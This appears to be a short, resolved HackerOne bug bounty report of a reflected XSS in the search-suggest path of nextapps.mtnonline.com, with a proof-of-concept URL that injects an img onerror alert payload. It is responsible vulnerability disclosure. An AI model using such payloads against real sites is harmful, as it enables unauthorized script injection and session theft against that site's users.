XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}
Medium
Vulnerability Details
PoC
```
http://nextapps.mtnonline.com/search/suggest/q/xss<img%20src=x%20onerror=alert()>1337
```
Symbols <'/"> are no filtered that alloweds to inject HTML code. Response has content-type: text/html
{F1353600}
## Impact
XSS at nextapps.mtnonline.com
Actions
View on HackerOneReport Stats
- Report ID: 1244722
- State: Closed
- Substate: resolved
- Upvotes: 7